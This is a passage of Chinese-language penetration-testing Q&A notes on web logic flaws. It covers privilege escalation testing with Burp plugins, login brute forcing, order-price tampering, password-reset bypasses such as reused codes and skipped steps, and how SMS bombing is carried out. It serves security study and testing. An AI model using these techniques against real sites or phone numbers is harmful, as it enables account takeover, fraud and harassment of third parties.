็š„ๆ•ฐๆฎๅŒ…๏ผŸ ่ฆ่ฟ›่กŒๅž‚็›ด่ถŠๆƒๆผๆดž็š„้ชŒ่ฏ๏ผŒๅ‰ๆๅฟ…้กป่Žทๅ–ๆทปๅŠ ็”จๆˆท็š„ๆ•ฐๆฎๅŒ… ๆ™ฎ้€š็”จๆˆทๆœ‰ๆ“ไฝœ็•Œ้ขๅฏไปฅๆŠ“ๅ–ๆ•ฐๆฎๅŒ… ้€š่ฟ‡ๆœฌๅœฐๆญๅปบ็ฝ‘็ซ™ๆบ็ ่‡ชๅทฑๆจกๆ‹ŸๆŠ“ๅ– ๆˆ–่€…ๅฐฑๆ˜ฏ็›ฒ็Œœ ###### ้€ป่พ‘่ถŠๆƒไบง็”Ÿ็š„ๅŽŸๅ› ๆ˜ฏไป€ไนˆ๏ผŸๅ‰ๅŽ็ซฏ้œ€่ฆๆณจๆ„ไป€ไนˆ๏ผŸ ๅ‰็ซฏๅฎ‰ๅ…จ้€ ๆˆ๏ผš็•Œ้ข๏ผŒๅˆคๆ–ญ็”จๆˆท็ญ‰็บงไน‹ๅŽ๏ผŒไปฃ็ ็•Œ้ข้ƒจๅˆ†่ฟ›่กŒๅฏ้€‰ๆ˜พ็คบ ๅŽ็ซฏๅฎ‰ๅ…จ้€ ๆˆ๏ผšๆ•ฐๆฎๅบ“ user่กจ ็ฎก็†ๅ‘˜ๅ’Œ็”จๆˆทๅŒ่กจ ๆ นๆฎusertype/level/otherๆฅๅˆคๆ–ญๆ˜ฏๅฆๆ˜ฏไป€ไนˆๆƒ้™ ๆˆ–่€…็”จ็ฑปไผผ็š„ๅญ—็ฌฆๅŽปๅˆคๆ–ญ็”จๆˆท็š„็บงๅˆซ๏ผŒๅฆ‚ๆžœๅœจ่ฎฟ้—ฎ็ฝ‘็ซ™ๆ•ฐๆฎๅŒ…ไธญๆœ‰ไผ ่พ“็”จๆˆท็š„็ผ–ๅทใ€็”จๆˆท็ป„็ผ–ๅทๆˆ–่€…็ฑปๅž‹็ผ–ๅท็š„ๆ—ถๅ€™๏ผŒ้‚ฃไนˆๅฐ่ฏ•ๅฏน่ฟ™ไธชๅ€ผ่ฟ›่กŒไฟฎๆ”น๏ผŒๅฐฑๆ˜ฏๆต‹่ฏ•่ถŠๆƒๆผๆดž ###### ๆ€Žไนˆๆฃ€ๆต‹ไธ€ไธช็ฝ‘็ซ™ๆ˜ฏๅฆๆœ‰้€ป่พ‘่ถŠๆƒ๏ผŸๅ…ทไฝ“ๅŽŸ็†ๆ˜ฏๆ€Žๆ ท็š„๏ผŸ ็™ป้™†ๆ™ฎ้€š็”จๆˆทA๏ผŒๆ‹ฟๅˆฐ็”จๆˆทA็š„cookie๏ผŒ้€š่ฟ‡ๅ‰ๆœŸ็š„ไฟกๆฏๆ”ถ้›†ๅŽปๅœจ่ฎฟ้—ฎA็š„ๆ•ฐๆฎๅŒ…้‡Œไฟฎๆ”น้ƒจๅˆ†ๆ•ฐๆฎ๏ผŒไฝฟๅพ—ๅฝ“ๅ‰ๆŸฅ็œ‹ไฟกๆฏ็š„urlๆ‰ง่กŒๅฆไธ€ไธช็”จๆˆทB๏ผŒๆญคๆ—ถไป็”จ็š„ๆ˜ฏA็š„cookieๅ‡ญๆฎ๏ผŒๅฆ‚ๆžœ่ƒฝๅคŸๅพ—ๅˆฐB็š„่บซไปฝไฟกๆฏ๏ผŒ้‚ฃไนˆๅฐฑๆ˜ฏๅญ˜ๅœจๆฐดๅนณ่ถŠๆƒๆผๆดž็š„ใ€‚ๅฏไปฅ้€‰ๆ‹ฉburpไธ‹็š„intruterไธๆ–ญ้‡ๅ‘็ผ–ๅท๏ผŒๆต‹่ฏ•ๅ…ถไป–็”จๆˆท็š„็ผ–ๅทใ€‚ ๅฆ‚ๆžœ็”จA็š„cookie็š„ๅ‡ญๆฎ็™ป้™†ไบ†ๅŽๅฐ็ฎก็†ๅ‘˜็š„่ดฆๆˆท๏ผŒ้‚ฃไนˆๅฐฑๆ˜ฏๅž‚็›ด่ถŠๆƒๆผๆดžใ€‚ ๅฆ‚ๆžœไธ็”จไปปไฝ•็š„ๆ™ฎ้€š็”จๆˆท็™ป้™†๏ผŒๅฐฑๅฏไปฅ่ฟ›ๅ…ฅๅฏนๆ–น็š„ๅŽๅฐ๏ผŒๅฐฑๅฑžไบŽๆœชๆŽˆๆƒ่ฎฟ้—ฎใ€‚ ###### burpไธญ็š„ๆ’ไปถauthzๆ˜ฏๅฆ‚ไฝ•ไฝฟ็”จ็š„๏ผŸ ็™ป้™†ๆ™ฎ้€š็”จๆˆทA๏ผŒๆˆชๅ–ๆ•ฐๆฎๅŒ…๏ผŒๅˆฉ็”จintruterๆจกๅผๅฐ†็”จๆˆทA็š„ๅง“ๅๆขๆˆๅ…ถไป–็”จๆˆท็š„ๅง“ๅ๏ผˆๅ‰ๆๆ˜ฏๆ’‡ๅผ€ๅฏ†็ ็š„ๅฝฑๅ“๏ผŒๆˆ–่€…ๅฏ†็ ๅทฒ็ปๅฏไปฅๅฎž็Žฐ็ช็ ด๏ผ‰๏ผŒๅฐ†ๆ•ฐๆฎๅ‘้€่‡ณauthzๆจกๅผ๏ผŒ้ž‹ๅธฆไธŠA็”จๆˆท็š„cookieๅ‡ญๆฎ๏ผŒๆ นๆฎๅ›žๅค็š„็‰นๅพ็ ๅˆคๆ–ญ็”จๆˆทๆ˜ฏๅฆ็™ป้™†ๆˆๅŠŸใ€‚ ###### ๅฆ‚ไฝ•ไฝฟ็”จburp็š„ๆ’ไปถAuthMatrix่ฟ›่กŒ้€ป่พ‘่ถŠๆƒ็š„ๅˆคๆ–ญ๏ผŸ ้œ€่ฆๅฎ‰่ฃ…jythonๅ’Œjrubyไธคไธช็Žฏๅขƒ๏ผŒๅ€’ๅ…ฅ่‡ณburp็š„ๆ‰ฉๅฑ•ๅบ”็”จไธญใ€‚ AuthMatrixyๆ’ไปถ็”จไบŽ่ถŠๆƒๆผๆดž็š„ๆฃ€ๆต‹๏ผŒๅœจๆ’ไปถไธญ้…็ฝฎๅคšไธชไธๅŒ็”จๆˆท็š„Cookies๏ผŒๆฃ€ๆต‹ๅ„็ญ‰็บง่ดฆๅทๅฏน้กต้ข็š„่ฎฟ้—ฎๆƒ้™ใ€‚ ๅœจ้ถๅœบๆณจๅ†Œไธคไธช่ดฆๅทๅ‘้€่‡ณburpไธญ๏ผŒๅœจburpไธญauthmatrixไธญๆทปๅŠ ็”จๆˆท่ง’่‰ฒไธบๅฏนๅบ”็š„่ดฆๅทใ€‚ ๅœจ็™ป้™†ๅ‡บ่ฟ›่กŒๆŠ“ๅŒ…๏ผŒๅ‘้€่‡ณrepeaterๆจกๅผ๏ผŒๅฐ†ไธคไธช็”จๆˆท็š„cookie็š„ไฟกๆฏๅˆ†ๅˆซๅ‘้€่‡ณๅ„่‡ชๅฏนๅบ”็š„ๆ’ไปถ็”จๆˆทไธญใ€‚ ๅœจ Repeater ๆˆ– Proxy ็š„ HTTP History ๅค„้€‰ๆ‹ฉ้œ€่ฆๆฃ€ๆต‹็š„ requests ๅŽๅณ้”ฎ๏ผŒ้€‰ๆ‹ฉ Send request to AuthMatrixใ€‚ runไผš่‡ชๅŠจๅฐ†ๆฏไธช request ้‡Œ็š„ cookie ๆขๆˆไน‹ๅ‰่ฎพ็ฝฎ็š„ๅŒๅ cookie๏ผŒๅฝ“ response ๅŒน้…ๅˆฐๆญฃๅˆ™ๆ—ถ๏ผŒไผšๅ‡บ็Žฐ็บข่‰ฒ๏ผŒๅไน‹ๆ˜ฏ็ปฟ่‰ฒ ###### ่ฐทๆญŒๆต่งˆๅ™จไธญๅ“ชๆฌพๆ’ไปถๅฏไปฅ่ฟ›่กŒ้€ป่พ‘่ถŠๆƒ็š„ๅˆคๆ–ญ๏ผŸ https://github.com/ztosec/secscan-authcheck ,ๅฏไปฅๅพˆๆ–นไพฟ็š„ๆฃ€ๆต‹่ถŠๆƒๆผๆดž๏ผŒไฝ†็Žฏๅขƒ้ƒจ็ฝฒๅคฑ่ดฅไบ† ###### ๅฆ‚ไฝ•้˜ฒ่Œƒ้€ป่พ‘่ถŠๆƒ๏ผŸ ๅ‰ๅŽ็ซฏๅŒๆ—ถๅฏน็”จๆˆท่พ“ๅ…ฅไฟกๆฏ่ฟ›่กŒๆ ก้ชŒ๏ผŒๅŒ้‡้ชŒ่ฏๆœบๅˆถ ็›ดๆŽฅๅŠ ๅฏ†่ต„ๆบID๏ผŒ้˜ฒๆญขๆ”ปๅ‡ป่€…ๆžšไธพID๏ผŒๆ•ๆ„Ÿๆ•ฐๆฎ็š„็‰นๆฎŠๅŒ–ๅค„็† ๆฐธ่ฟœไธ่ฆ็›ธไฟกๆฅ่‡ช็”จๆˆท็š„่พ“ๅ…ฅ๏ผŒๅฏนไบŽๅฏๆŽงๅ‚ๆ•ฐ็š„ไธฅๆ ผๆฃ€ๆŸฅไบŽ่ฟ‡ๆปค ๅ„็งไธชๆ ท็š„WAFไบงๅ“ ๆ•ฐๆฎๅฏไปฅ็›ดๆŽฅไปŽๆ•ฐๆฎๅบ“ไธญๅ–๏ผŒ่€Œ้žไปŽๆ•ฐๆฎๅŒ…ไธญ่Žทๅ–ๆ•ฐๆฎ ๅ›ž้€€้‡ๆข๏ผšๅ…ˆ่ดญไนฐไธ€ไธชไบงๅ“๏ผŒๅœจ้‡ๆ–ฐ่ดญไนฐไธ€้๏ผŒๅฆ‚ๆžœๆฒกๆœ‰ๆฃ€ๆต‹ๆ•ฐๆฎๅŒ…็š„ๅ”ฏไธ€ๆ€งๆˆ–่€…token๏ผŒ้‚ฃไนˆไผšๅœจๆญค่ดญไนฐ๏ผŒไบŽๆ˜ฏๅฏไปฅไปฅไฝŽไปทๆ ผๅฎž็Žฐ้ซ˜ไปทๆ ผ็š„่ดญไนฐ๏ผŒ่ฟ™ๆ˜ฏ้€ป่พ‘ไธŠ็š„ไธ€ไธช้—ฎ้ข˜ไบง็”Ÿๅœจๅคšๆ–น้ข็š„๏ผŒ็งฐไธบ้€ป่พ‘ๅฎ‰ๅ…จ้—ฎ้ข˜ ### 20.httpไธŽhttps็™ป้™†็š„ๅŒบๅˆซๅœจๅ“ช้‡Œ๏ผŸไธค่€…่ฟ›่กŒ็ˆ†็ ด้œ€่ฆๆณจๆ„ไป€ไนˆ๏ผŸ http็™ป้™†็š„ๆ—ถๅ€™ๅฏ†็ ๆ˜ฏๆ˜Žๆ–‡ๆ˜พ็คบ็š„,ๆญฃๅธธ็š„่ฏๆ˜ฏไธไผšๅŠ ๅฏ†็š„๏ผŒๅฏไปฅไพๆฌกๆ›ฟๆขๅญ—ๅ…ธ่ฟ›่กŒ็ˆ†็ ด ๅฆ‚ๆžœๅŠ ๅฏ†ไบ†๏ผŒๅฏไปฅๅฐ่ฏ•็ ด่งฃๅŠ ๅฏ†ๆ–นๅผ๏ผŒๅฐ†่‡ชๅทฑ็š„ๆณจๅ…ฅ็‚นไปฃ็ ่ฟ›่กŒๅŒๆ ท็š„ๅŠ ๅฏ†ๆ–นๅผๅŠ ๅฏ†็„ถๅŽๅ‘้€่‡ณๆœๅŠกๅ™จ httpsไธ€่ˆฌ้ƒฝๆ˜ฏๅŠ ๅฏ†ไบ†็š„๏ผŒๅฐ่ฏ•ๆ˜ฏๅฆ่ƒฝ็ ด่งฃๅ…ถๅŠ ๅฏ†ๆ‰‹ๆฎต๏ผŒๅฆ‚ๆžœๆ— ๆณ•็ ด่งฃ้‚ฃไนˆๆ„ๅ‘ณ็€ๆ— ๆณ•็ˆ†็ ด ###### ็™ป้™†็š„ๅœฐๆ–น่ฟ›่กŒ็ˆ†็ ด็š„ๆ–นๅผ๏ผŸ ็ฌฌไธ€็งๆ–นๅผๆ˜ฏ็›ดๆŽฅ่ท‘ๅญ—ๅ…ธ๏ผŒ็ฌฌไบŒ็งๆ–นๅผๆ˜ฏๅœจ็ ด่งฃๅฏนๆ–นๅŠ ๅฏ†ๆ‰‹ๆฎตๅŽๅฐ†่‡ชๅทฑ็š„ๅญ—ๅ…ธไปฅๅŠ ๅฏ†็š„ๅฝขๅผๅ‘้€ๅ‡บๅŽปใ€‚ ###### burpๅฆ‚ไฝ•่ฟ›่กŒ็ˆ†็ ด้…ๅˆๅŠ ๅฏ†่ฟ›่กŒๅฏน็ฝ‘็ซ™ๅŽๅฐ็š„็ช็ ด๏ผŸ ้ฆ–ๅ…ˆ็”จ็›ฎๅฝ•ๆ‰ซๆๅทฅๅ…ทๆ‰ซๆๅ‡บๅฏนๆ–น็ฝ‘็ซ™็š„ๅŽๅฐๅœฐๅ€ๅนถๅฐ่ฏ•็™ป้™†๏ผŒๆŠ“ๅ–ๆ•ฐๆฎ๏ผŒๅฐ†ๆ•ฐๆฎๅ‘้€่‡ณintruder๏ผŒๅŠ ่ฝฝๅฏ†็ ๅญ—ๅ…ธ๏ผŒไปฅhash็ฎ—ๆณ•ไธญ็š„ๅŠ ๅฏ†็ฎ—ๆณ•่ฟ›่กŒๅŠ ๅฏ†่‡ชๅทฑ็š„ๅญ—ๅ…ธ๏ผŒ่ฟ›่กŒๆšดๅŠ›็ ด่งฃใ€‚ๆ นๆฎ่ฟ”ๅ›žๆ•ฐๆฎ็š„้•ฟๅบฆๅˆคๆ–ญๆ˜ฏๅฆ็ ด่งฃๆˆๅŠŸใ€‚ Hash๏ผŒไธ€่ˆฌ็ฟป่ฏ‘ๅšๆ•ฃๅˆ—ใ€ๆ‚ๅ‡‘๏ผŒๆˆ–้Ÿณ่ฏ‘ไธบๅ“ˆๅธŒ๏ผŒๆ˜ฏๆŠŠไปปๆ„้•ฟๅบฆ็š„่พ“ๅ…ฅ้€š่ฟ‡ๆ•ฃๅˆ—็ฎ—ๆณ•ๅ˜ๆขๆˆๅ›บๅฎš้•ฟๅบฆ็š„่พ“ๅ‡บ๏ผŒ่ฏฅ่พ“ๅ‡บๅฐฑๆ˜ฏๆ•ฃๅˆ—ๅ€ผใ€‚ๅ…ถไธญmd5ๅฐฑๅฑžไบŽไธ€็งhash็ฎ—ๆณ•ใ€‚ ###### cookie่„†ๅผฑ็‚น็š„ๆ”ปๅ‡ป ๆœ‰็š„็™ป้™†ๆ˜ฏ้œ€่ฆ้ชŒ่ฏcookie็š„๏ผŒcookie่ฟ‡ๆปคไธไธฅ่ฐจๅฏผ่‡ดๅฏไปฅ้šๆ„็ฏกๆ”นๆ•ฐๆฎๅŒ…็™ป้™† ๅฆ‚ไฝ•ๅฏปๆ‰พcookie็š„่„†ๅผฑ็‚นๅพˆ้šพ๏ผŒ้œ€่ฆ็ป“ๅˆๆบ็ ๅฎก่ฎกๅฎŒๆˆ๏ผŒๅฆ‚ๆœ‰็š„็ฝ‘็ซ™้€ป่พ‘้ชŒ่ฏไธๅฎŒๅ–„๏ผŒไผšๅœจ็™ป้™†็š„cookie็š„ๅœฐๆ–น่ฟ›่กŒๅˆคๆ–ญ๏ผŒๅชๆ˜ฏไธ€ไธช็ฎ€ๅ•็š„ๅˆคๆ–ญ็š„ๅœฐๆ–นๅฏไปฅ่‡ชๅทฑ่ฟ›่กŒ็ป•่ฟ‡ใ€‚ ###### ๅ•†ๅ“่ดญไนฐๆต็จ‹ไธญๅฏ่ƒฝๅ‡บ็Žฐ็š„ๆผๆดž๏ผš ้€‰ๆ‹ฉๅ•†ๅ“ๅ’Œๆ•ฐ้‡-้€‰ๆ‹ฉๆ”ฏไป˜ๅŠ้…้€ๆ–นๅผ-็”Ÿๆˆ่ฎขๅ•็ผ–ๅท-่ฎขๅ•ๆ”ฏไป˜้€‰ๆ‹ฉ-ๅฎŒๆˆๆ”ฏไป˜ ๆ นๆฎ่ดญไนฐๆ—ถๆŠ“ๅ–ๆ•ฐๆฎๅŒ…่ฟ›่กŒๅˆ†ๆž๏ผŒๆต‹่ฏ•ๆ˜ฏๅฆ่ƒฝไฟฎๆ”นๆ•ฐ้‡๏ผŒ่ฎขๅ•็ผ–ๅท๏ผŒๅ•†ๅ“็ญ‰ไฟกๆฏ ไธป่ฆ็œ‹ๅฏนๆ–น็š„ๆ•ฐๆฎๅŒ…ไธญไผ ๅ…ฅ็š„ๆ˜ฏไป€ไนˆๅ‚ๆ•ฐ๏ผŒไปŽ่€Œ่ฟ›่กŒๆต‹่ฏ• ๅฆ‚ๆžœๅฏนๆ–นไปฃ็ ้€ป่พ‘ไธไธฅ่ฐจ๏ผŒๅฏไปฅๅฏนไฝŽไปท่ฎขๅ•่ดญไนฐ้ซ˜ไปท่ฎขๅ•๏ผŒไผช้€ ๅ•†ๅ“ๆ•ฐ้‡๏ผŒไผช้€ ๅ•†ๅ“ไปทๆ ผ๏ผŒไผช้€ ๅฝ“ๅ‰่ฎขๅ•็ผ–ๅท็ญ‰ๆ•ˆๆžœ ### 21.ๆ‰พๅ›žๅฏ†็ ๆต็จ‹ๆ—ถๅฏ่ƒฝๅญ˜ๅœจๅ“ชไบ›ๆผๆดž๏ผŒๅฆ‚ไฝ•ๅˆฉ็”จ๏ผŸ ### ไป€ไนˆๆƒ…ๅ†ตๅฏไปฅ็ˆ†็ ด๏ผŒๆ˜ฏๅฆๅฏไปฅๆ›ฟๆขไธบๅ…ถไป–็š„้ชŒ่ฏ็ ๏ผŸ ๆ‰พๅ›žๅฏ†็ ๆ—ถๅญ˜ๅœจไธ€ไธช้ชŒ่ฏ็ ๅค็”จ็š„้—ฎ้ข˜๏ผŒๅผ€ๅ‘่€…ๅชไบง็”Ÿไบ†็”Ÿๆˆ้ชŒ่ฏ็ ๏ผŒๆฒกๆœ‰ๅฏนๅฝ“ๅ‰็š„้ชŒ่ฏ็ ไธŽๆ‰‹ๆœบๅท่ฟ›่กŒๅฏนๅบ”๏ผŒ ไบŽๆ˜ฏๅฏไปฅๅˆฉ็”จไธ€ไธชๅทฒ็Ÿฅ็š„ๆ‰‹ๆœบๅท็ ๅŽป็”ณ่ฏทไธ€ไธช้ชŒ่ฏ็ ๏ผŒๅœจๅˆฉ็”จ่ฟ™ไธช้ชŒ่ฏ็ ๅŽปไฟฎๆ”นๅ…ถไป–ไบบ็š„ๆ‰‹ๆœบๅทๅฏ†็ ๅณๅฏใ€‚ ๅฆ‚ๆžœๆญค้ชŒ่ฏ็ ๆ˜ฏ็บฏๆ•ฐๅญ—ๅŠ ๅญ—ๆฏ็š„ๆƒ…ๅ†ต๏ผŒๅนถไธ”ๅŽๅฐๆฒกๆœ‰ๅšไปปไฝ•้™ๅˆถ๏ผŒๆฏ”ๅฆ‚ไธ€ๅˆ†้’Ÿๆœ€ๅคš่ฏทๆฑ‚1ๆฌก๏ผŒๅฏไปฅ่ฟ›่กŒ็ˆ†็ ดใ€‚ ๅœจๆ•ฐๆฎๅŒ…ไธญ็œ‹ๆ˜ฏๅฆๆœ‰้ชŒ่ฏ็ ็š„ไฟกๆฏไฝ“็Žฐ๏ผŒๆ˜ฏๅฆ่ขซๅŠ ๅฏ†ไบ†๏ผŒ่ƒฝๅฆ่งฃๅฏ†ๅ‡บๆฅ็ญ‰ๆƒ…ๅ†ตใ€‚ ###### ไธ‰ๆฎต้ชŒ่ฏไธŽไธ€ๆฎต้ชŒ่ฏๅ…ทไฝ“ไธŠๆ“ไฝœๆœ‰ไป€ไนˆๅŒบๅˆซ๏ผŸ ๅŒบๅˆซๅœจไบŽ็ป•่ฟ‡็š„ๆ–นๅผๆ˜ฏไธๅŒ็š„๏ผŒไธ€่ˆฌ้‡‡็”จๅฆ‚ไธ‹ไธค็งๆ–นๆณ• ไธ€่ˆฌๆ˜ฏ็ฌฌไธ€ไธช้กต้ข ่พ“ๅ…ฅๆ‰‹ๆœบๅท ่Žทๅ–้ชŒ่ฏ็  ็ฌฌไบŒไธช้กต้ข ้‡็ฝฎๅฏ†็  ไฝ†ๅฆ‚ๆžœๆ˜ฏๅฏนๆ–นๅชๆœ‰ไธ€ไธช้กต้ข๏ผŒ่ฟ™ไธช้กต้ข้‡Œ่พน่ƒฝๅกซๅ†™ๆ‰€ๆœ‰ไฟกๆฏ๏ผŒ้‚ฃไนˆๅฐฑไธๅฎ‰ๅ…จ ๅ…ˆ็”จ่‡ชๅทฑ็š„ๆ‰‹ๆœบๅทๅ†™ไธŠๅŽป๏ผŒๅพ—ๅˆฐ้ชŒ่ฏ็ ๏ผŒไฟ่ฏ้ชŒ่ฏ็ ๆญฃ็กฎ็š„ๅ‰ๆไธ‹๏ผŒไฟฎๆ”น่‡ชๅทฑ็š„ๆ‰‹ๆœบๅทไธบๅฆไธ€ไธช็”จๆˆท็š„ๆ‰‹ๆœบๅท๏ผŒๆ”นๅ˜ๅ…ถๆ‰‹ๆœบๅท็š„ๅฏ†็ ๏ผˆๅœจๆ•ฐๆฎๅŒ…้‡Œๆ”นๆŽ‰ๆ‰‹ๆœบๅท๏ผ‰ ๅฆ‚ๆžœๆ˜ฏ็ฌฌไธ€ไธช้กต้ข ่Žทๅ–้ชŒ่ฏ็  ็ฌฌไบŒไธช้กต้ข ้ชŒ่ฏ ็ฌฌไธ‰ไธช้กต้ข ้‡็ฝฎๅฏ†็  ๆŠŠไธ‰ไธช้กต้ข็š„ๆ•ฐๆฎๅŒ…ๅ…จ้ƒจๆŠ“ๅˆฐ๏ผŒๅœจ็ฌฌไธ€ไธช้กต้ข็š„ๆ•ฐๆฎๅŒ…ๅŠ ่ฝฝๅฎŒๆˆไน‹ๅŽๆ›ฟๆขไธบ็ฌฌไธ‰ไธช้กต้ข็š„ๆ•ฐๆฎๅŒ…๏ผŒๅฐ†็ฌฌไบŒไธช้กต้ข็ป™็›ดๆŽฅ่ทณ่ฟ‡๏ผŒๆ˜ฏๆต็จ‹้—ฎ้ข˜ ###### burpไปฃ็†ๅ›žๅค็š„ๆ•ฐๆฎๅŒ…๏ผŒๅฆ‚ไฝ•ไปฃ็†๏ผŸๆœ‰ไฝ•ๆ„ไน‰๏ผŸ ไธไป…ๅฏไปฅๅชๆ‹ฆๆˆช็”ฑๆœฌๅœฐๅ‘้€็š„ๆ•ฐๆฎๅŒ…ๅนถไธ”่ฟ›่กŒ็ฏกๆ”น๏ผŒ่€Œไธ”ไนŸๅฏไปฅๆ‹ฆๆˆช็”ฑๅฏนๆ–นๆœๅŠกๅ™จๅ‘้€็š„ๆ•ฐๆฎๅŒ…๏ผŒ่ฟ›่กŒๅ›žๅคๆ•ฐๆฎ็š„ไผช้€  ๅœจๆˆชๅ–ๅˆฐๅ‘้€็š„ๆ•ฐๆฎๅŒ…ๅŽ่ฟ›่กŒๆ“ไฝœdointercept---response to this request๏ผŒๅฏไปฅๆˆชๅ–ๅ›žๅค็š„ๆ•ฐๆฎๅŒ… ๆŸไบ›ๅบ”็”จไผš้€š่ฟ‡ๆœๅŠกๅ™จ็š„ๅ›žๆ˜พๅ€ผๆฅๅˆคๆ–ญๆ˜ฏๅฆๅŠ ่ฝฝๆŸไบ›ๆœ‰ๆƒ้™็š„้กต้ข๏ผŒๅฏไปฅๆ›ดๆ”นๆฌกๅ›žๅคๅ€ผ่ฟ›่กŒไผช้€  ๅฆ‚ไฝ•้€š่ฟ‡burpๆŠ“ๅ–้ชŒ่ฏ็ ็š„ๅ›žๅคๅ€ผๅฎž็Žฐไปปๆ„ๆ‰‹ๆœบๅทๆ— ้ชŒ่ฏ็ ไฟฎๆ”นๅฏ†็ ๏ผŸๆœ‰ไป€ไนˆๅ‰ๆๆกไปถ๏ผŸๆœ‰ไป€ไนˆ็‰น็‚น๏ผŸ ๅ‰ๆๆ˜ฏๅฏนๆ–นๅผ€ๅ‘่€…็š„้€ป่พ‘ไธŠๆœ‰่ฟ™ไธชๆผๆดž๏ผŒ้ชŒ่ฏ็ ๆœฌๅบ”ๅญ˜ๅ‚จๅœจๅฏนๆ–นๅŽๅฐไธ”ไฝฟ็”จ่ฟ‡ๅŽๅฐฑ่ฆ้”€ๆฏ็š„ ๅฆ‚ๆžœๅฏนๆ–น้’ˆๅฏนไธ€ไธช้ชŒ่ฏ็ ๅฐฑๅชๆœ‰ไธ€ๆฌก้ชŒ่ฏ็š„ๆœบไผš็š„่ฏ๏ผŒๆ˜ฏไธไผšๆœ‰่ฟ™ไธชๆผๆดž็š„ ###### burpไปฃ็†ๆ‰‹ๆœบๆต้‡็š„ๆ—ถๅ€™้œ€่ฆๆณจๆ„ไป€ไนˆๅœฐๆ–น๏ผŸ ไปฃ็†ๆ‰‹ๆœบๆต้‡็š„ๆ—ถๅ€™๏ผŒburp็š„ไปฃ็†่ฆๅผ€ๅœจไธปๆœบipๅœฐๅ€ไธ‹็š„ๆŸไธชๅผ€ๆ”พ็š„็ซฏๅฃ๏ผŒ่€Œไธ่ƒฝๆ˜ฏๆœฌๅœฐๅ›ž็Žฏๅœฐๅ€ ๅŒๆ—ถๆ‰‹ๆœบ้œ€่ฆๅ’Œburpๅค„ไบŽๅŒไธ€ๅฑ€ๅŸŸ็ฝ‘ๅ†…๏ผŒๅนถๅœจๅฑ€ๅŸŸ็ฝ‘็š„ไปฃ็†ๅค„่ฎพ็ฝฎไธบburpๅผ€็š„ไปฃ็† ###### ็Ÿญไฟก่ฝฐ็‚ธ็š„ๅŽŸ็†ๆ˜ฏไป€ไนˆ๏ผŸๅฆ‚ไฝ•ๅฎž็Žฐ๏ผŸ ๆŸไบ›ๅบ”็”จ็‚นๅ‡ปๆณจๅ†Œ็š„ๆ—ถๅ€™ๆˆช่Žทๆ•ฐๆฎๅŒ…๏ผŒๅฐ†่ฟ™ไธชๆ•ฐๆฎๅŒ…่ฟ›่กŒๆˆชๅ–๏ผŒๅœจๆ•ฐๆฎๅŒ…ไธญๅฏ่ƒฝไผšๆœ‰ๆ˜Žๆ–‡ไผ ้€็š„ๆ‰‹ๆœบๅท ๅฐ†ๆญคๆ‰‹ๆœบๅท่ฎพ็ฝฎไธบไธ€ไธชๅŠจๆ€็š„payload๏ผŒ้€š่ฟ‡่‡ชๅทฑๅทฒ็Ÿฅ็š„ๅ…ถไป–ไบบ็š„ๅญ—ๅ…ธ่ฟ›่กŒๅ‘ๅŒ…๏ผŒ้€š่ฟ‡่ฎพ็ฝฎๅปถๆ—ถๅ‘้€ๆ•ฐๆฎๅŒ… ๅฎž็Žฐไบ†ๅฏนๆ‰‹ๆœบๅท็š„็Ÿญไฟก่ฝฐ็‚ธ็š„ๅŠŸ่ƒฝ ๆœๅŠก็ซฏ้ชŒ่ฏ็ ้ชŒ่ฏๅฏ่ƒฝไผšๆœ‰ไป€ไนˆๆผๆดž๏ผŸๆ€Žไนˆ็ช็ ด๏ผŸ ๆœๅŠก็ซฏ็š„้ชŒ่ฏ็ ไธ€่ˆฌๆ˜ฏๅค็”จ็š„้—ฎ้ข˜ๆˆ–่€…่ฟ›่กŒ็ˆ†็ ด๏ผŒๅฏไปฅ้‡ๅคๅˆฉ็”จๆŸไธ€ไธช้ชŒ่ฏ็ ๆˆ–่€…ๅฐ†้ชŒ่ฏ็ ไปŽ0ๅผ€ๅง‹็ˆ†็ ด ๅฎขๆˆท็ซฏ้ชŒ่ฏ็ ๆ˜ฏๅฆไผšๆœ‰ๆผๆดžๅญ˜ๅœจ๏ผŸๅฆ‚ไฝ•ๅˆคๆ–ญๆ—ถๅฎขๆˆท็ซฏ็š„้ชŒ่ฏ๏ผŸๅฆ‚ไฝ•็ช็ ด๏ผŸ ๅฎขๆˆท็ซฏ้ชŒ่ฏ็ ไธ€่ˆฌๆ˜ฏ้€š่ฟ‡jsๆ–‡ไปถๅŠ ่ฝฝ็š„๏ผŒๅฎขๆˆท็ซฏ็š„้ชŒ่ฏๅฎŒๅ…จๅฏไปฅ้€š่ฟ‡ไปฃ็†่ฝฏไปถ่ฟ›่กŒ็ช็ ด ้ชŒ่ฏ็ ๅค็”จๅฏไปฅ็”จๆฅๅšไป€ไนˆ๏ผŸๅฏ่ƒฝไผš้‡ๅˆฐไป€ไนˆ้šœ็ข๏ผŸ ๅฏไปฅไปปๆ„ไฟฎๆ”นๅˆซไบบๆ‰‹ๆœบๅทๅฏนๅบ”็š„ๅฏ†็ ๏ผŒๅฏ่ƒฝ้‡ๅˆฐ็š„ๆ˜ฏ60s่ฎค่ฏ้šœ็ขใ€‚ ### 22.tokenๆ˜ฏไป€ไนˆ๏ผŸ tokenๆฏไธ€ๆฌก็™ป้™†็š„ๆ—ถๅ€™้ƒฝไผš้šๆœบไบง็”Ÿไธ€ไธช๏ผŒๆ˜ฏ้˜ฒๆŠค่€…ๅš็š„ไธ€ไธชๅฎ‰ๅ…จไฝ“็ณป๏ผŒๆ˜ฏๆฏ”่พƒๅฎ‰ๅ…จ็š„ใ€‚ไธ€่ˆฌๅพˆ้šพ็ ด่งฃ๏ผŒๅฆ‚sha256็ฎ—ๆณ•ๆฒกๆœ‰ๅฏ†้’ฅๆ˜ฏๆฒกๆณ•ๅพ—ๅˆฐ่งฃๅฏ†ไฟกๆฏ็š„๏ผŒๅฏไปฅๅฐ่ฏ•็”จ็ˆ†็ ด๏ผŒๆˆ–่€…ไปŽ่ฟ”ๅ›žๆ•ฐๆฎไธญๆˆชๅ–tokenๆต‹่ฏ•ใ€‚ๅฆ‚ๆžœๆฒกๆœ‰ๅฐฑๆ”พๅผƒใ€‚ ###### burp ไธญintruder็š„ๅ››็งๆจกๅผๅˆ†ๅˆซๆ˜ฏไป€ไนˆ๏ผŸ ``` Sniper--1 payload set--ๅ…ถไป–ๅ˜้‡ไธๅ˜๏ผŒ็ฌฌไธ€ไธชๅ˜้‡ๅ…ˆ้ๅŽ†ๆ‰€ๆœ‰็š„payload๏ผŒไปฅๆญค็ฑปๆŽจ Battering Raw--1 payload 